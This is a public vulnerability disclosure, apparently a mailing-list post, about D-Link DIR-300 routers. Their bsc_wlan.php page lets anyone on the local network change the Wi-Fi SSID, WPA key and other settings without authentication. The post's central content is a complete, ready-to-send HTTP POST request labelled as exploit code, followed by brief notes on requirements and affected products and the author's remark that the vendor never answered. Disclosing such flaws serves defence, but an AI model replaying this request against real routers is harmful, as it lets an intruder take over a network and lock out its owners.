Hello All,

Here is another D-Link vulnerability where you can change the network Key
(i.e., WEP, WPAx keys).

Requirement:
1. You need to have access to the internal network of that router. The two
scenarios are mentioned below:

Scenario A: You know the network/ WIFI key to connect to the WIFI network
but you may not have administration privilege to the device. Office scenario
Scenario B: You are on wired LAN and the device is also on the LAN, allowing
users to use the WiFi feature/ service.


===Exploit Code===
POST http://192.168.0.1/bsc_wlan.php HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml
Accept-Charset: ISO-8859-1,utf-8
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 320



ACTION_POST=final&f_enable=1&f_wps_enable=1&f_ssid=KingGeorgeV&f_channel=6&f_auto_channel=0&f_super_g=&f_xr=&f_txrate=0&f_wmm_enable=0&f_ap_hidden=0&f_authentication=7&f_cipher=2&f_wep_len=&f_wep_format=&f_wep_def_key=&f_wep=&f_wpa_psk_type=1&f_wpa_psk=
khuljas%21ms%21m&f_radius_ip1=&f_radius_port1=&f_radius_secret1=
=====End Exploit Code===

*What it does*
The php file in the request allows Internal network systems, i.e., in this
case 192.168.0.0/24, to change the WiFi Key without any authorization. This
will also allow you to change other parameters/ configuration settings of
the device.

Affected Products: DIR-300 (tested) and others

*Greets:*
Friends: Plash, Satyam, int2root
Mentor who inspired me: n2n


Cheers,
Gaurav Saha



P.S I have sent this bug to DLink but never received any response. Hence I
am disclosing the bug to the PUBLIC.